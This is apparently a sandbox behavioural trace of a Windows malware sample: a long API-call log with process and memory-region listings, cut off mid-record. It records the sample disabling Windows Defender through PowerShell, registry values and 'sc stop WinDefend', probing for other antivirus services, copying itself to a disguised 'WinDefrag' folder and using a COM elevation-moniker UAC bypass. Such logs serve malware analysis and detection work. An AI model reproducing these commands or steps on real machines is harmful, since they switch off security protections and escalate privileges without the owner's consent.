th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0120.082] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCui.exe") returned -1 [0120.082] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0120.083] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCui.exe") returned -1 [0120.083] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0120.084] CloseHandle (hObject=0x12c) returned 1 [0120.084] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x28e170*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28e160 | out: lpCommandLine="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x28e160*(hProcess=0x124, hThread=0x12c, dwProcessId=0x894, dwThreadId=0x890)) returned 1 [0120.094] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x102, phkResult=0x28e1b8 | out: phkResult=0x28e1b8*=0x0) returned 0x2 [0120.094] RegSetValueExW (hKey=0x0, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x28e1b4, cbData=0x4) returned 0x6 [0120.094] RegCloseKey (hKey=0x0) returned 0x6 [0120.094] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications", ulOptions=0x0, samDesired=0x102, phkResult=0x28e1b8 | out: phkResult=0x28e1b8*=0x0) returned 0x2 [0120.094] RegSetValueExW (hKey=0x0, lpValueName="DisableNotifications", Reserved=0x0, dwType=0x4, lpData=0x28e1b4, cbData=0x4) returned 0x6 [0120.094] RegCloseKey (hKey=0x0) returned 0x6 [0120.094] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5580e8 [0120.095] OpenServiceW (hSCManager=0x5580e8, lpServiceName="MBAMService", dwDesiredAccess=0x4) returned 0x0 [0120.095] CloseServiceHandle (hSCObject=0x5580e8) returned 1 [0120.095] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5580e8 [0120.095] OpenServiceW (hSCManager=0x5580e8, lpServiceName="SAVService", dwDesiredAccess=0x4) returned 0x0 [0120.095] CloseServiceHandle (hSCObject=0x5580e8) returned 1 [0120.095] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28df54, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp6149.exe")) returned 0x30 [0120.095] GetCurrentProcess () returned 0xffffffff [0120.095] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x28da74 | out: TokenHandle=0x28da74*=0x130) returned 1 [0120.096] GetTokenInformation (in: TokenHandle=0x130, TokenInformationClass=0x1, TokenInformation=0x28da78, TokenInformationLength=0x4c, ReturnLength=0x28da60 | out: TokenInformation=0x28da78, ReturnLength=0x28da60) returned 1 [0120.096] AllocateAndInitializeSid (in: pIdentifierAuthority=0x28da6c, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x28da68 | out: pSid=0x28da68*=0x557050*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0120.096] EqualSid (pSid1=0x28da80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68)), pSid2=0x557050*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0 [0120.096] CloseHandle (hObject=0x130) returned 1 [0120.096] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x28db3c | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0120.101] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\T", lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned -1 [0120.101] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FAQ" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\faq"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0120.101] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag"), lpSecurityAttributes=0x0) returned 1 [0120.103] CopyFileW (lpExistingFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp6149.exe"), lpNewFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe"), bFailIfExists=0) returned 1 [0120.119] GetCurrentProcess () returned 0xffffffff [0120.119] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x28dab0 | out: TokenHandle=0x28dab0*=0x138) returned 1 [0120.119] NtQueryInformationToken (in: TokenHandle=0x138, TokenInformationClass=0x12, TokenInformation=0x28dac0, TokenInformationLength=0x4, ReturnLength=0x28daa8 | out: TokenInformation=0x28dac0, ReturnLength=0x28daa8) returned 0x0 [0120.119] CloseHandle (hObject=0x138) returned 1 [0120.119] GetWindowsDirectoryW (in: lpBuffer=0x28d698, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0120.119] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0120.119] lstrcatW (in: lpString1="C:\\Windows\\", lpString2="explorer.exe" | out: lpString1="C:\\Windows\\explorer.exe") returned="C:\\Windows\\explorer.exe" [0120.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x50eee1*=0x0, ZeroBits=0x0, RegionSize=0x28d694*=0x1000, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x50eee1*=0x520000, RegionSize=0x28d694*=0x1000) returned 0x0 [0120.119] lstrcpyW (in: lpString1=0x520000, lpString2="C:\\Windows\\explorer.exe" | out: lpString1="C:\\Windows\\explorer.exe") returned="C:\\Windows\\explorer.exe" [0120.119] RtlInitUnicodeString (in: DestinationString=0x531448, SourceString="C:\\Windows\\explorer.exe" | out: DestinationString="C:\\Windows\\explorer.exe") [0120.119] RtlInitUnicodeString (in: DestinationString=0x531450, SourceString="bloody booty bla de bludy botty bla lhe capitaine bloode!" | out: DestinationString="bloody booty bla de bludy botty bla lhe capitaine bloode!") [0120.120] LdrEnumerateLoadedModules () returned 0x0 [0120.120] RtlInitUnicodeString (in: DestinationString=0x53284c, SourceString="C:\\Windows\\explorer.exe" | out: DestinationString="C:\\Windows\\explorer.exe") [0120.120] RtlInitUnicodeString (in: DestinationString=0x532854, SourceString="explorer.exe" | out: DestinationString="explorer.exe") [0120.120] Sleep (dwMilliseconds=0x1f4) [0120.809] CoInitialize (pvReserved=0x0) returned 0x0 [0121.079] IIDFromString (in: lpsz="{6EDD6D74-C007-4E75-B76A-E5740995E24C}", lpiid=0x28da90 | out: lpiid=0x28da90) returned 0x0 [0121.080] CLSIDFromString (in: lpsz="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", pclsid=0x28daa4 | out: pclsid=0x28daa4*(Data1=0x3e5fc7f9, Data2=0x9a51, Data3=0x4367, Data4=([0]=0x90, [1]=0x63, [2]=0xa1, [3]=0x20, [4]=0x24, [5]=0x4f, [6]=0xbe, [7]=0xc7))) returned 0x0 [0121.080] lstrlenW (lpString="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") returned 38 [0121.080] lstrcpyW (in: lpString1=0x28d5c8, lpString2="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" | out: lpString1="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") returned="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" [0121.080] lstrcpyW (in: lpString1=0x28d648, lpString2="Elevation:Administrator!new:" | out: lpString1="Elevation:Administrator!new:") returned="Elevation:Administrator!new:" [0121.080] lstrcatW (in: lpString1="Elevation:Administrator!new:", lpString2="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" | out: lpString1="Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") returned="Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" [0121.088] CoGetObject (in: pszName="Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", pBindOptions=0x28d59c, riid=0x28da90*(Data1=0x6edd6d74, Data2=0xc007, Data3=0x4e75, Data4=([0]=0xb7, [1]=0x6a, [2]=0xe5, [3]=0x74, [4]=0x9, [5]=0x95, [6]=0xe2, [7]=0x4c)), ppv=0x28da8c | out: ppv=0x28da8c*=0x54cabc) returned 0x0 [0129.044] ObjectStublessClient9 () [0129.545] IUnknown:Release (This=0x54cabc) returned 0x0 [0129.547] Sleep (dwMilliseconds=0x1f4) [0130.052] ExitProcess (uExitCode=0x0) Thread: id = 106 os_tid = 0x83c Thread: id = 117 os_tid = 0x8c8 Thread: id = 118 os_tid = 0x8f4 Thread: id = 119 os_tid = 0x940 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5bec000" os_pid = "0x8a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x698" cmd_line = "/c sc stop WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1521 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1522 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1523 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1524 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1525 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1526 start_va = 0x4a090000 end_va = 0x4a0dbfff entry_point = 0x4a090000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1527 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1528 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1529 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1530 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1531 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1532 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1533 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1534 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1535 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1539 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1540 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1541 start_va = 0x140000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1542 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1543 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1544 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1831 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1832 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1833 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1834 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1835 start_va = 0x754b0000 end_va = 0x754b6fff entry_point = 0x754b0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1836 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1837 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1838 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1839 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1840 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1841 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1842 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1843 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1844 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1845 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1846 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1847 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1848 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1849 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1850 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1851 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1852 start_va = 0x4a0000 end_va = 0x627fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1853 start_va = 0x670000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1854 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1855 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1856 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1857 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1858 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1859 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1860 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1861 start_va = 0x810000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1862 start_va = 0x1c10000 end_va = 0x1f52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 1865 start_va = 0x1f60000 end_va = 0x222efff entry_point = 0x1f60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 107 os_tid = 0x8ac [0120.317] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32fa9c | out: lpSystemTimeAsFileTime=0x32fa9c*(dwLowDateTime=0xe8327900, dwHighDateTime=0x1d48db2)) [0120.317] GetCurrentProcessId () returned 0x8a4 [0120.317] GetCurrentThreadId () returned 0x8ac [0120.317] GetTickCount () returned 0x2a3cd [0120.317] QueryPerformanceCounter (in: lpPerformanceCount=0x32fa94 | out: lpPerformanceCount=0x32fa94*=1818794100000) returned 1 [0120.318] GetModuleHandleA (lpModuleName=0x0) returned 0x4a090000 [0120.318] __set_app_type (_Type=0x1) [0120.318] __p__fmode () returned 0x75ab31f4 [0120.318] __p__commode () returned 0x75ab31fc [0120.318] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0b21a6) returned 0x0 [0120.318] __getmainargs (in: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c, _DoWildCard=0, _StartInfo=0x4a0b4140 | out: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c) returned 0 [0120.318] GetCurrentThreadId () returned 0x8ac [0120.318] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8ac) returned 0x60 [0120.318] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0120.319] GetProcAddress (hModule=0x76220000, lpProcName="SetThreadUILanguage") returned 0x7624a84f [0120.319] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.321] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.321] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32fa2c | out: phkResult=0x32fa2c*=0x0) returned 0x2 [0120.321] VirtualQuery (in: lpAddress=0x32fa63, lpBuffer=0x32f9fc, dwLength=0x1c | out: lpBuffer=0x32f9fc*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.321] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32f9fc, dwLength=0x1c | out: lpBuffer=0x32f9fc*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0120.321] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32f9fc, dwLength=0x1c | out: lpBuffer=0x32f9fc*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0120.321] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32f9fc, dwLength=0x1c | out: lpBuffer=0x32f9fc*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.321] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32f9fc, dwLength=0x1c | out: lpBuffer=0x32f9fc*(BaseAddress=0x330000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0120.321] GetConsoleOutputCP () returned 0x1b5 [0120.321] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0120.321] SetConsoleCtrlHandler (HandlerRoutine=0x4a0ae72a, Add=1) returned 1 [0120.321] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.321] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0120.322] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.322] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0120.322] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.322] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.322] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.322] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0120.324] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.324] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0120.324] GetEnvironmentStringsW () returned 0x3b2310* [0120.324] FreeEnvironmentStringsW (penv=0x3b2310) returned 1 [0120.325] GetEnvironmentStringsW () returned 0x3b2310* [0120.325] FreeEnvironmentStringsW (penv=0x3b2310) returned 1 [0120.325] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e99c | out: phkResult=0x32e99c*=0x68) returned 0x0 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x0, lpData=0x32e9a8*=0x0, lpcbData=0x32e9a0*=0x1000) returned 0x2 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x4, lpData=0x32e9a8*=0x1, lpcbData=0x32e9a0*=0x4) returned 0x0 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x0, lpData=0x32e9a8*=0x1, lpcbData=0x32e9a0*=0x1000) returned 0x2 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x4, lpData=0x32e9a8*=0x0, lpcbData=0x32e9a0*=0x4) returned 0x0 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x4, lpData=0x32e9a8*=0x40, lpcbData=0x32e9a0*=0x4) returned 0x0 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x4, lpData=0x32e9a8*=0x40, lpcbData=0x32e9a0*=0x4) returned 0x0 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x0, lpData=0x32e9a8*=0x40, lpcbData=0x32e9a0*=0x1000) returned 0x2 [0120.325] RegCloseKey (hKey=0x68) returned 0x0 [0120.325] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e99c | out: phkResult=0x32e99c*=0x68) returned 0x0 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x0, lpData=0x32e9a8*=0x40, lpcbData=0x32e9a0*=0x1000) 